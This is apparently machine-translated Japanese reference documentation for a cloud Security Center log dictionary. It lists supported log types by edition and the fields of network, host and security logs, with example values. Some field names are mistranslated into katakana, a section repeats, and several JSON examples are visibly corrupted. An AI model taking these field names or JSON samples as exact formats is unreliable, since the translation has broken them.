Security Centerのログを表示して、セキュリティイベントの特定、調査、処理をできるだけ早く行うことができます。 ログストレージ容量を購入すると、Security Centerはセキュリティイベントのセキュリティログ、ネットワークトラフィックのネットワークログ、およびホスト動作のホストログを自動的に収集します。 このトピックでは、Security Center V1.0ログ辞書でサポートされているログの種類と、各種類のログのフィールドについて説明します。
異なるエディションでサポートされているログタイプ
セキュリティ機能とサポートされるログタイプは、security Centerのエディションによって異なります。 完全保護モードでは、使用可能なログタイプは、購入したSecurity Centerエディションによって決まります。 クォータ管理がサポートされている部分保護モードでは、ログタイプはサーバーにバインドされているSecurity Centerエディションに基づいています。 次の表は、さまざまなエディションでサポートされているログタイプの概要です。
エディション | サポートされるログタイプ |
Enterprise EditionとUltimate Edition | すべてのログタイプ |
Anti-virus EditionおよびAdvanced Edition | すべてのホストログとセキュリティログ |
バインドされていない承認済みサーバー |
|
異なるエディションでサポートされているログタイプ
セキュリティ機能とサポートされるログタイプは、security Centerのエディションによって異なります。 完全保護モードでは、使用可能なログタイプは、購入したSecurity Centerエディションによって決まります。 クォータ管理がサポートされている部分保護モードでは、ログタイプはサーバーにバインドされているSecurity Centerエディションに基づいています。 次の表は、さまざまなエディションでサポートされているログタイプの概要です。
エディション | サポートされるログタイプ |
Enterprise EditionとUltimate Edition | すべてのログタイプ |
Anti-virus EditionおよびAdvanced Edition | すべてのホストログとセキュリティログ |
バインドされていない承認済みサーバー |
|
ログのタイプ
ネットワークログの種類
Outside Chinaデータ管理センターでは、ネットワークログはサポートされていません。
ログタイプ | __topic__ | 説明 | 収集サイクル |
sas-log-http | ユーザーのIPアドレス、要求時間、要求方法、要求URL、HTTPステータスコード、および応答サイズを含む、webサーバーへのユーザー要求およびwebサーバーからの応答のログ。 Webアクセスログは、webトラフィックとユーザーの行動を分析し、アクセスパターンと例外を特定し、Webサイトのパフォーマンスを最適化するために使用されます。 | ほとんどの場合、ログはログが生成されてから1〜12時間後に収集されます。 | |
sas-log-dns | 要求されたドメイン名、クエリタイプ、クライアントのIPアドレス、応答値など、DNS解決の詳細のログ。 DNS解決の要求と応答プロセスを監視し、DNSログに基づいて異常な解決動作、DNSハイジャック、DNSポイズニングを特定できます。 | ||
local-dns | リクエストされたドメイン名、クエリタイプ、クライアントのIPアドレス、レスポンス値など、ローカルDNSサーバー上のDNSクエリとレスポンスのログ。 ネットワーク内のDNSクエリに関する情報を取得し、内部DNSログに基づいて、異常なクエリ動作、ドメインハイジャック、DNSポイズニングなどの問題を特定できます。 | ||
sas-log-session | ネットワークセッションの詳細を含む、ネットワーク接続とデータ送信のログ。 詳細には、セッション開始時刻、送信元IPアドレス、宛先IPアドレス、プロトコル、およびポートが含まれます。 ネットワークセッションログは、一般に、ネットワークトラフィックの監視、潜在的な脅威の特定、およびネットワークパフォーマンスの最適化に使用されます。 |
ホストログの種類
ログタイプ | __topic__ | 説明 | 収集サイクル |
aegis-log-login | サーバーへのユーザーログオンのログ (ログオン時間、ログオンユーザー、ログオン方法、ログオンIPアドレスなど) 。 ログオンログは、ユーザーのアクティビティを監視し、異常な動作を早期に特定して対応するのに役立ちます。 これにより、システムのセキュリティが確保されます。 説明 セキュリティセンターは、Windows Server 2008を実行しているサーバーへのログオンのログを収集しません。 | ログはリアルタイムで収集されます。 | |
aegis-log-network | サーバーへの接続の5タプル、接続時間、接続ステータスなど、ネットワーク接続のログ。 ネットワーク接続ログは、疑わしい接続の検出、潜在的なネットワーク攻撃の特定、およびネットワークパフォーマンスの最適化に役立ちます。 説明
| ログはリアルタイムで収集されます。 | |
aegis-log-process | 起動時間、起動コマンド、パラメーターなど、サーバープロセスの起動ログ。 サーバープロセスの起動状態と構成を取得し、プロセスの起動ログに基づいて異常プロセス、マルウェアの侵入、脅威などの問題を特定できます。 | ログはリアルタイムで収集されます。 プロセスが開始されると、ログはすぐに収集されます。 | |
aegis-log-crack | ブルートフォース攻撃のログ (ログオン試行、システム、アプリケーション、またはアカウントのクラック試行に関する情報など) 。 システムまたはアプリケーションに対するブルートフォース攻撃に関する情報を取得し、ブルートフォース攻撃ログに基づいて、異常なログオン試行、弱いパスワード、および資格情報の漏洩を特定できます。 また、ブルートフォース攻撃ログを使用して悪意のあるユーザーを追跡し、証拠を収集して、セキュリティチームのインシデント対応と調査を支援することもできます。 | ログはリアルタイムで収集されます。 | |
aegis-snapshot-host | アカウントに関する基本情報を含む、システムまたはアプリケーションのアカウントのログ。 基本情報には、アカウントのユーザー名、パスワードポリシー、およびログオン履歴が含まれます。 さまざまな時点でのアカウントのスナップショットログを比較することで、アカウントの変更を取得し、潜在的なリスクを最も早い機会に特定できます。 リスクには、不正なアカウントからのアクセスや異常なアカウントステータスが含まれます。 |
| |
aegis-snapshot-port | 5タプルの接続、接続ステータス、および関連するプロセスを含む、ネットワーク接続のログ。 システム内のネットワークソケットに関する情報を取得し、異常な接続と潜在的なネットワーク攻撃を特定し、ネットワークスナップショットログに基づいてネットワークパフォーマンスを最適化できます。 | ||
aegis-snapshot-process | プロセスID、プロセス名、プロセス開始時刻など、システム内のプロセスのログ。 システム内のプロセスおよびプロセスのリソース使用量に関する情報を取得し、プロセスのスナップショットログに基づいて、異常プロセス、過剰なCPU使用率、メモリリークなどの問題を特定できます。 | ||
aegis-log-dns-query | 要求されたドメイン名、クエリタイプ、およびクエリソースを含む、サーバーによって送信されたDNS要求のログ。 ネットワーク内のDNSクエリに関する情報を取得し、DNSリクエストログに基づいて、異常なクエリ、ドメインハイジャック、DNSポイズニングなどの問題を特定できます。 | ログはリアルタイムで収集されます。 | |
aegis-log-client | Security Centerエージェントのオンラインおよびオフラインイベントのログ。 | ログはリアルタイムで収集されます。 |
セキュリティログの種類
ログタイプ | __topic__ | 説明 | 収集サイクル |
sas-vul-log | 脆弱性名、脆弱性ステータス、処理アクションなど、システムまたはアプリケーションで検出された脆弱性のログ。 システムの脆弱性、セキュリティリスク、攻撃傾向に関する情報を取得し、脆弱性ログに基づいて早期に適切な対策を講じることができます。 | ログはリアルタイムで収集されます。 | |
sas-hc-log | ベースラインの重大度、ベースラインの種類、リスクレベルなど、ベースラインチェック結果のログ。 ベースラインログに基づいて、システムのベースラインセキュリティステータスと潜在的なリスクを取得できます。 説明 ログには、最初にチェックに失敗したチェック項目のデータと、以前のチェックに合格したが新しいチェックに失敗したチェック項目のデータのみが記録されます。 | ||
sas-security-log | アラートデータソース、アラートの詳細、アラートレベルなど、システムとアプリケーションで生成されたセキュリティイベントとアラートのログ。 システム内のセキュリティイベントや脅威を取得し、アラートログを基にした早い機会に適切な対策を講じることができます。 | ||
sas-cspm-log | 構成評価のチェック結果やホワイトリストにリスク項目を追加する操作など、構成評価に関連するログ。 設定評価ログに基づいて、クラウドサービスの設定のエラーと潜在的なリスクに関する情報を取得できます。 | ||
sas-net-block | 攻撃タイプ、送信元IPアドレス、宛先IPアドレスなどの重要な情報を含む、ネットワーク攻撃イベントのログ。 ネットワークセキュリティイベントを取得し、適切な対応と防御策を実装して、ネットワーク防御ログに基づいてネットワークのセキュリティと信頼性を向上させることができます。 | ||
sas-rasp-log | 攻撃タイプ、攻撃パターン、攻撃者IPアドレスなどの重要な情報を含む、アプリケーションに対する攻撃のログ。 アプリケーションで発生したセキュリティイベントに関する情報を取得し、適切な対応と防御策を実装して、アプリケーション保護ログに基づいてアプリケーションのセキュリティと信頼性を向上させることができます。 | ||
sas-filedetect-log | ファイル情報、検出シナリオ、検出結果など、悪意のあるファイル検出のログ。 オフラインファイルやObject Storage Service (OSS) オブジェクトのランサムウェアやマイニングプログラムなどの一般的なウイルスを特定し、ログに基づいて悪意のあるファイルの拡散や実行を防ぐために、最も早い機会にウイルスを処理できます。 |
ネットワークログ
Security Center EnterpriseおよびUltimateのみがネットワークログをサポートします。
Webアクセスログ
フィールド名 | 説明 | 例 |
content_length | メッセージ本文の長さ。 単位はバイトです。 | 612 |
dst_ip | 宛先ホストのIPアドレス。 | 39.105.XX.XX |
dst_port | 宛先ホストのポート。 | 80 |
host | 宛先ホストのIPアドレスまたはドメイン名。 | 39.105.XX.XX |
jump_location | リダイレクトアドレス。 | 123 |
method | HTTP リクエストの方式。 | GET |
referer | HTTPリファラー。 このフィールドには、要求されているリソースにリンクされているwebページのURLが含まれます。 | www.example.com |
request_datetime | リクエストが開始された時刻。 | 2023-08-07 22:42:41 |
ret_code | HTTP ステータスコード。 | 200 |
rqs_content_type | リクエストコンテンツのタイプ。 | text/plain;charset=utf-8 |
rsp_content_type | 応答コンテンツのタイプ。 | text/plain; charset=utf-8 |
src_ip | 送信元 IP アドレス。 | 31.220.XX.XX |
src_port | 送信元ポート。 | 59524 |
ウリ | URI リクエスト。 | /レポート |
user_agent | リクエストを開始するユーザーエージェント。 | okhttp/3.2.0 |
x_forward_for | クライアントの送信元IPアドレスを記録するHTTPリクエストヘッダー。 | 31.220.XX.XX |
DNSログ
フィールド名 | 説明 | 例 |
追加 | DNSサーバーによって返され、CNAMEレコード、MXレコード、PTRレコードなどの情報を記録する追加フィールド。 | 非該当 |
additional_num | DNSサーバーによって返される追加レコードの数。 | 0 |
答え | DNSサーバーによって返されたDNS回答。解決結果を示します。 DNS回答には、要求されたドメイン名が解決されるIPアドレス、またはAレコードやAAAAレコードなどの他の情報が含まれます。 | example.com A IN 52 1.2.XX.XX |
answer_num | DNSの回答数。 | 1 |
権限 | DNSサーバーによって返される権限フィールド。 権限は、ドメイン名を管理および解決するDNSサーバーです。 権限フィールドには、NSレコードなど、要求されたドメイン名のDNSレコードを提供するDNSサーバーに関する情報が含まれます。 | 17597のNS |
authority_num | 当局の数。 | 1 |
client_subnet | クライアントのサブネット。 | 59.152.XX.XX |
dst_ip | 送信先 IP アドレス。 | 106.55.XX.XX |
dst_port | 宛先ポート。 | 53 |
in_out | データ伝送の方向。 有効な値:
| アウト |
qid | クエリのID。 | 13551 |
qname | 照会されるドメイン名。 | example.com |
qtype | クエリのタイプです。 | A |
query_datetime | クエリの時刻。 | 2023-08-25 09:59:15 |
rcode | DNSサーバーから返されたレスポンスコード。DNS解決結果を示します。 | 0 |
region | ソースリージョンのID。 有効な値:
| 1 |
response_datetime | DNSサーバーの応答時間。 | 2023-08-25 09:59:16 |
src_ip | 送信元 IP アドレス。 | 106.11.XX.XX |
src_port | 送信元ポート。 | 22 |
内部DNSログ
フィールド名 | 説明 | 例 |
answer_rda | DNS回答のリソースデータ領域 (RDA) フィールド。解決結果の具体的な値を示します。 | 106.11.XX.XX |
answer_ttl | DNS回答の有効期間 (TTL) 。 単位は秒です。 | 600 |
answer_type | DNS回答のタイプ。 有効な値:
| 1 |
anwser_name | DNS応答の名前。リソースレコードに関連付けられているドメイン名を示します。 | example.com |
dest_ip | 送信先 IP アドレス。 デフォルトでは、この値は10進数のIPアドレスです。 | 323223 **** |
dest_port | 宛先ポート。 | 53 |
group_id | グループID。 同じグループIDは、同じDNS要求または応答を示します。 | 3 |
hostname | ホスト名を示します。 | hostname |
id | DNS要求またはDNS応答を識別するクエリのID。 | 64588 |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
internet_ip | DNS要求または応答に含まれるパブリックIPアドレス。 | 121.40.XX.XX |
ip_ttl | DNS要求または応答のIPパケットのTTL。 | 64 |
query_name | 照会されるドメイン名。 | example.com |
query_type | クエリのタイプです。 有効な値:
| 1 |
src_ip | DNS要求または応答が開始されるIPアドレス。 デフォルトでは、この値は10進数のIPアドレスです。 | 168427 **** |
src_port | DNS要求または応答が開始されるポートの番号。 | 53 |
time | DNS要求または応答のタイムスタンプ。 単位は秒です。 | 1537840756 |
time_usecond | DNS要求または応答のタイムスタンプ。 単位:マイクロ秒。 | 49069 |
tunnel_id | DNS要求または応答で使用されるトンネルのID。 トンネリングは、異なるプロトコルを使用してデータを転送する方法です。 トンネリングは、インターネットへの安全なアクセス、または異なるネットワークを介した通信に使用できます。 | 514763 |
ネットワークセッションログ
フィールド名 | 説明 | 例 |
asset_type | ログが収集されるアセットのタイプ。 有効な値:
| ECS |
dst_ip | 送信先 IP アドレス。 | 119.96.XX.XX |
dst_port | 宛先ポート。 | 443 |
in_out | セッションの方向。 値はoutとして固定されます。
| アウト |
proto | プロトコルのタイプ。 有効な値:
| tcp |
session_time | セッションが開始される時刻。 | 2023-08-15 09:59:49 |
src_ip | 送信元 IP アドレス。 | 121.40.XX.XX |
src_port | 送信元ポート。 | 53602 |
ホストログ
ログオンログ
フィールド名 | 説明 | 例 |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
ip | サーバーの IP アドレス。 | 192.168.XX.XX |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
uuid | サーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
warn_ip | サーバーへのログオンに使用されるIPアドレス。 | 221.11.XX.XX |
warn_port | サーバーへのログオンに使用されるポート。 | 22 |
warn_type | ログインタイプ。 有効な値:
| SSH |
warn_user | ログインに使用されるユーザー名。 | admin |
warn_count | ログオン試行回数。 1分以内に繰り返されるログオン試行は、1つのログに記録されます。 たとえば、 | 3 |
ネットワーク接続ログ
フィールド名 | 説明 | 例 |
cmd_chain | プロセスチェーン。 | [ { "9883":"bash -c kill -0 -- '6274'" } ...... ] |
cmd_chain_index | プロセスチェーンのインデックス。 インデックスを使用して、プロセスチェーンを検索できます。 | B184 |
container_hostname | コンテナー内のサーバーの名前。 | nginx-ingress-controller-765f67fd4d-**** |
container_id | コンテナID。 | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d **** |
container_image_id | イメージ ID。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | コンテナ名。 | nginx-ingress-**** |
container_pid | コンテナ内のプロセスのID。 | 0 |
dir | ネットワーク接続の方向。 有効な値:
| in |
dst_ip | 送信先 IP アドレス。
| 192.168.XX.XX |
dst_port | 宛先ポート。 | 443 |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
ip | サーバーの IP アドレス。 | 192.168.XX.XX |
parent_proc_file_name | 親プロセスファイルの名前。 | /usr/bin/bash |
ピッド | プロセスのID。 | 14275 |
ppid | 親プロセスID。 | 14268 |
proc_name | プロセスの名前。 | nginx |
proc_path | プロセスへのパス。 | /usr/local/nginx/sbin/nginx |
proc_start_time | プロセスが開始された時刻。 | 非該当 |
proto | プロトコル。 有効な値:
| tcp |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
src_ip | 送信元 IP アドレス。 | 100.127.XX.XX |
src_port | 送信元ポート。 | 41897 |
srv_comm | 親プロセスの親プロセスに関連付けられているコマンド名。 | containerd-shim |
status | ネットワーク接続のステータス。 有効な値:
| 5 |
type | リアルタイムネットワーク接続のタイプ。 有効な値:
| 聞く |
uid | プロセスを開始したユーザーのID。 | 101 |
username | プロセスを開始したユーザーの名前。 | root |
uuid | サーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
プロセス起動ログ
フィールド名 | 説明 | 例 |
cmd_chain | プロセスチェーン。 | [ { "9883":"bash -c kill -0 -- '6274'" } ...... ] |
cmd_chain_index | プロセスチェーンのインデックス。 インデックスを使用して、プロセスチェーンを検索できます。 | B184 |
cmd_index | コマンドラインのパラメータのインデックス。 各2つのインデックスは、パラメータの開始とパラメータの終了を識別するためにグループ化される。 | 0,3,5,8 |
cmdline | プロセスを開始するための完了コマンド。 | ipsetリストKUBE-6-CLUSTER-IP |
comm | プロセスに関连するコマンド名。 | 非該当 |
container_hostname | コンテナー内のサーバーの名前。 | nginx-ingress-controller-765f67fd4d-**** |
container_id | コンテナID。 | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d **** |
container_image_id | イメージ ID。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | コンテナ名。 | nginx-ingress-**** |
containerpid | コンテナ内のプロセスのID。 | 0 |
cwd | プロセスの現在の作業ディレクトリ (CWD) 。 | 非該当 |
filename | プロセスファイルの名前。 | ipset |
ファイルパス | プロセスファイルへのフルパス。 | /usr/sbin/ipset |
gid | プロセスグループのID。 | 0 |
グループ名 | ユーザーグループの名を指定します。 | group1 |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
ip | サーバーの IP アドレス。 | 192.168.XX.XX |
parent_cmd_line | 親プロセスのコマンドライン。 | /usr/local/bin/kube-proxy -- config=/var/lib/kube-proxy/config.conf -- hostname-override=cn-beijing.192.168.XX.XX |
pfilename | 親プロセスファイルの名前。 | kube-proxy |
pfilepath | 親プロセスファイルへのフルパス。 | /usr/local/bin/kube-proxy |
ピッド | プロセスのID。 | 14275 |
ppid | 親プロセスID。 | 14268 |
pstime | 親プロセスが開始された時刻。 | 2023-08-09 14:19:00 |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
srv_cmd | 先祖プロセスのコマンドライン。 | /usr/bin/containerd |
tty | ログオンしているターミナル。 N/Aの値は、アカウントが端末ログオンに使用されていないことを示します。 | 非該当 |
uid | ユーザー ID。 | 123 |
uid | プロセスを開始したユーザーのID。 | 101 |
username | プロセスを開始したユーザーの名前。 | root |
uuid | サーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
ブルートフォース攻撃ログ
フィールド名 | 説明 | 例 |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
ip | ブルートフォース攻撃を受けているサーバーのIPアドレス。 | 192.168.XX.XX |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
uuid | ブルートフォース攻撃を受けているサーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 ***** |
warn_count | 失敗したログオン試行の回数。 1分以内に繰り返されるログオン試行は、1つのログに記録されます。 たとえば、 | 3 |
warn_ip | 送信元 IP アドレス。 | 47.92.XX.XX |
warn_port | ログインポート。 | 22 |
warn_type | ログインタイプ。 有効な値:
| SSH |
warn_user | ログインに使用されるユーザー名。 | user |
アカウントスナップショットログ
フィールド名 | 説明 | 例 |
account_expire | アカウントの有効期限が切れる日付。 値はnever、アカウントの有効期限が切れないことを示します。 | 決して |
domain | アカウントが属するドメインまたはディレクトリ。 値N/Aは、アカウントがドメインに属していないことを示します。 | 非該当 |
グループ | アカウントが属するグループ。 値N/Aは、アカウントがグループに属していないことを示します。 | ["nscd"] |
home_dir | ホームディレクトリ。システム内のファイルを保存および管理するためのデフォルトのディレクトリです。 | /ユーザー /abc |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
ip | サーバーの IP アドレス。 | 192.168.XX.XX |
last_chg | パスワードが最後に変更された日付。 | 2022-11-29 |
last_logon | アカウントを使用して開始された最後のログインの日時。 値N/Aは、アカウントがログオンに使用されていないことを示します。 | 2023-08-18 09:21:21 |
login_ip | アカウントを使用して最後にリモートログオンを開始したIPアドレス。 値N/Aは、アカウントがログオンに使用されていないことを示します。 | 192.168.XX.XX |
passwd_expire | パスワードの有効期限が切れた日付。 never値は、パスワードの有効期限が切れないことを示します。 | 2024-08-24 |
パーマ | アカウントにroot権限があるかどうかを示します。 有効な値:
| 0 |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
shell | Linuxシェルコマンド。 | /sbin/nologin |
status | アカウントのステータス。 有効な値:
| 0 |
tty | ログオンしているターミナル。 N/Aの値は、アカウントが端末ログオンに使用されていないことを示します。 | 非該当 |
user | ユーザー名を指定します。 | nscd |
uuid | サーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
warn_time | 期限切れのパスワードが通知された日付。 この値は、通知が送信されないことを示しません。 | 2024-08-20 |
ネットワークスナップショットログ
フィールド名 | 説明 | 例 |
dir | ネットワーク接続の方向。 有効な値:
| in |
dst_ip | 送信先 IP アドレス。
| 192.168.XX.XX |
dst_port | 宛先ポート。 | 443 |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
ip | サーバーの IP アドレス。 | 192.168.XX.XX |
ピッド | プロセスのID。 | 682 |
proc_name | プロセスの名前。 | sshd |
proto | プロトコル。 有効な値:
| tcp4 |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
src_ip | 送信元 IP アドレス。 | 100.127.XX.XX |
src_port | 送信元ポート。 | 41897 |
status | ネットワーク接続のステータス。 有効な値:
| 5 |
uuid | サーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
スナップショットログの処理
フィールド名 | 説明 | 例 |
cmdline | プロセスを開始するための完了コマンド。 | /usr/local/share/assist-daemon/assist_daemon |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
ip | サーバーの IP アドレス。 | 192.168.XX.XX |
md5 | バイナリファイルのMD5ハッシュ値。 説明 MD5アルゴリズムは、サイズが1 MBを超えるファイルではサポートされません。 | 1086e731640751c9802c19a7f53a64f5 |
name | プロセスファイルの名前。 | assist_daemon |
パス | プロセスファイルへのフルパス。 | /usr/local/share/assist-daemon/assist_daemon |
ピッド | プロセスのID。 | 1692 |
pname | 親プロセスファイルの名前。 | systemd |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
start_time | プロセスが開始された時刻。 これは組み込みのフィールドです。 | 2023-08-18 20:00:12 |
uid | プロセスを開始したユーザーのID。 | 101 |
username | プロセスを開始したユーザーの名前。 | root |
uuid | サーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
DNSリクエストログ
フィールド名 | 説明 | 例 |
domain | DNSリクエストに含まれるドメイン名。 | example.aliyundoc.com |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
ip | DNSリクエストを開始するサーバーのIPアドレス。 | 192.168.XX.XX |
ピッド | DNSリクエストを開始するプロセスのID。 | 3544 |
ppid | DNSリクエストを開始する親プロセスのID。 | 3408 |
proc_cmd_chain | DNS要求を開始するプロセスのチェーン。 | "3544":"\" C :\\ プログラムファイル (x86)\\Alibaba\\Aegis\\AliDetect\\AlitDetect.exe \"" |
proc_cmdline | DNS要求を開始するプロセスのコマンドライン。 | C:\プログラムファイル (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | DNS要求を開始するプロセスへのパス。 | C:/プログラムファイル (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
time | DNSリクエストがキャプチャされた時刻。 ほとんどの場合、値はDNS要求が開始された時点です。 | 2023-08-17 20:05:04 |
uuid | DNS要求を開始するサーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
Agentイベントログ
フィールド名 | 説明 | 例 |
uuid | サーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
client_ip | サーバーの IP アドレス。 | 192.168.XX.XX |
agent_version | Security Centerエージェントのバージョン。 | aegis_11_91 |
last_login | 最後のログインのタイムスタンプ。 単位:ミリ秒。 | 1716444387617 |
platform | オペレーティングシステムのタイプ。 有効な値:
| linux |
region_id | サーバーが存在するリージョンのID。 | cn-beijing |
status | Security Centerエージェントのステータス。 有効な値:
| online |
セキュリティログ
脆弱性ログ
フィールド名 | 説明 | 例 |
alias_name | 脆弱性のエイリアス。 | CESA-2023:1335: opensslセキュリティアップデート |
extend_content | 脆弱性に関する拡張情報。 | {"cveList":["CVE-2023-0286"],"innessy":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","" preCheck ":{}、" rpmCanUpdate ":true、" rpmEntityList ":[{" fullVersion ":" 1.0.2 k-25.el7_9 "、" kernel ":false、" matchDetail ":" openssl-libs version less than 1.0.2 k-26.el7_9 "、" matchList ":[" openssl-libs version less than 1.0.2 "" 、"nextl" result "]" path ":"/etc/pki/tls "、" result ":true、" updateCmd ":" yum update openssl-libs "、" version ":" 1.0.2 k-25.el7_9 "},{" fullVersion ":" 1.0.2 k-25.el7_9 "、" kernel ":false、" matchDetail ":" openssl version less than 1.0.2 k-26.el7_9 "、" matchList ":[" opensslバージョン1.0.2未満のk-26.el7_9 "] 、" name ":" openssl "、" nextResult ":false、" path ":"/etc/pki/CA "、" result ":true、" updateCmd ":" yum update openssl "、" バージョン ":" 1.0.2 k-25.el7_9 "}}}} |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
internet_ip | ホストのパブリックIPアドレス。 | 39.104.XX.XX |
intranet_ip | ホストのプライベートIPアドレス。 | 192.168.XX.XX |
machine_name | ホスト名を示します。 | hhht-linux-*** |
name | 脆弱性の名前。 | centos:7:cesa-2023:1335 |
op | 脆弱性に対する操作。 有効な値:
| new |
status | ステータス情報。 有効な値:
| 1 |
tag | 脆弱性に追加されたタグ。 有効な値:
| オーバル |
type | 脆弱性のタイプ。 有効な値:
| sys |
uuid | サーバーのUUID。 | ad66133a-dc82-4e5e-9659-a49e3 **** |
ベースラインログ
フィールド名 | 説明 | 例 |
check_item | チェックアイテムの名前。 | パスワード変更の最短間隔を設定する |
check_level | ベースラインのリスクレベル。 有効な値:
| medium |
check_type | チェックアイテムのタイプ。 | ID 認証 |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
level | リスク項目の重大度。 有効な値:
| medium |
op | 操作。 有効な値:
| new |
risk_name | リスクアイテムの名前。 | パスワード遵守チェック |
sas_group_name | Security Center内のサーバーが属するサーバーグループ。 リスク項目がサーバーで検出されます。 | default |
status | ステータス情報。 有効な値:
| 1 |
sub_type_alias | 中国語のサブタイプのエイリアス。 | 国際的に合意されたセキュリティのベストプラクティス-Ubuntu 16/18/20/22セキュリティベースラインチェック |
sub_type_name | サブタイプの名前。 ベースラインサブタイプの詳細については、「ベースラインタイプとサブタイプ」をご参照ください。 | hc_ubuntu16_cis_rules |
type_alias | 中国语のチェックタイプのエイリアス。 | セキュリティのための国際的に合意されたベストプラクティス |
type_name | ベースラインのタイプ。 ベースラインタイプの詳細については、「ベースラインタイプとサブタイプ」をご参照ください。 | シス |
uuid | リスク項目が検出されたサーバーのUUID。 | 1ad66133a-dc82-4e5e-9659-a49e3 **** |
アラートログ
フィールド名 | 説明 | 例 |
data_source | データソース。 有効な値:
| aegis_login_log |
詳細 | アラートの詳細。 説明 ログのdetailフィールドの値は、アラートタイプによって異なります。 アラートログを表示するときにdetailフィールドにパラメーターに関する質問がある場合は、チケットを起票し、テクニカルサポートにお問い合わせください。 | {"loginSourceIp":"221.11.XX.XX" 、"loginDestinationPort":22、"loginUser":"root" 、"protocol":2、"protocolName":"SSH" 、"clientIp":"192.168.XX.XX" 、"loginTimes":1、"location":"Xi'an" 、"type" 「異常なアカウントを使用してECSインスタンスにログインします」、「status」: 0} |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
internet_ip | ホストのパブリックIPアドレス。 | 39.104.XX.XX |
intranet_ip | ホストのプライベートIPアドレス。 | 192.168.XX.XX |
level | アラートのリスクレベル。 有効な値:
| 疑わしい |
name | アラートの名前。 | 異常なログイン-異常なアカウントを使用したECSインスタンスへのログイン |
op | 操作。 有効な値:
| new |
status | アラートのステータス。 有効な値:
| 1 |
unique_info | アラートのUUID。 | 2536dd765f804916a1fa3b9516b5 **** |
uuid | アラートが生成されるサーバーのUUID。 | ad66133a-dc82-4e5e-9659-a49e3 **** |
設定評価ログ
フィールド名 | 説明 | 例 |
check_id | チェックアイテムのID。 ListCheckResult操作を呼び出して、チェック項目のIDを照会できます。 この操作は、クラウドサービスの設定チェックで検出されたリスク項目の詳細を照会するために使用されます。 | 11 |
check_show_name | チェックアイテムの名前。 | Back-to-origin 設定 |
instance_id | インスタンスのID。 | i-2zeg4zldn8zypsfg **** |
instance_name | インスタンスの名前です。 | lsm |
instance_result | リスクの影響。 値はJSON文字列です。 | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text" },{ "key":"InstanceIdShow","search":true,"" Instance ID "," type ":" link "},{" key ":" InstanceNameShow "," search ":true," searchKey ":" InstanceNameKey "," showName ":" Instance Name "," type ":" text "}]} |
instance_sub_type | インスタンスのサブタイプ。 有効な値:
| INSTANCE |
instance_type | インスタンスのタイプ。 有効な値:
| ECS |
region_id | インスタンスのリージョン ID です。 | cn-hangzhou |
requirement_id | 要件アイテムID。 ListCheckStandard操作を呼び出して、要件項目のIDを照会できます。 この操作は、構成チェックの標準を照会するために使用される。 | 5 |
risk_level | リスクレベル。 有効な値:
| ミディアム |
section_id | セクションID。 ListCheckResult操作を呼び出して、セクションIDを照会できます。 この操作は、クラウドサービスの設定チェックで検出されたリスク項目の詳細を照会するために使用されます。 | 1 |
standard_id | 標準ID。 ListCheckStandard操作を呼び出して、標準IDを照会できます。 この操作は、構成チェックの標準を照会するために使用される。 | 1 |
status | チェックアイテムのステータス。 有効な値:
| パス |
ベンダー | クラウドサービスプロバイダー。 値はALIYUNとして固定されます。 | ALIYUN |
ネットワーク防御ログ
フィールド名 | 説明 | 例 |
cmd | 攻撃されたプロセスのコマンドライン。 | nginx: マスタープロセスnginx |
cur_time | 攻撃イベントが発生した時刻。 | 2023-09-14 09:21:59 |
decode_payload | デコードされた16進ペイロード。 | POST /サービス /FileService/UserFiles / |
dest_ip | 攻撃されたアセットのIPアドレス。 | 172.16.XX.XX |
dest_port | 攻撃された資産のポート。 | 80 |
func | ブロックされたイベントのタイプ。 有効な値:
| payload |
